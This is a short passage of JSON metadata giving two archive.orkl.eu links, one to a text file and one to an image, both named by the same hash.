"text": "https://archive.orkl.eu/dbb55bc5b016da66d2021a78743f7284add9c492.txt", "img": "https://archive.orkl.eu/dbb55bc5b016da66d2021a78743f7284add9c492.jpg" } }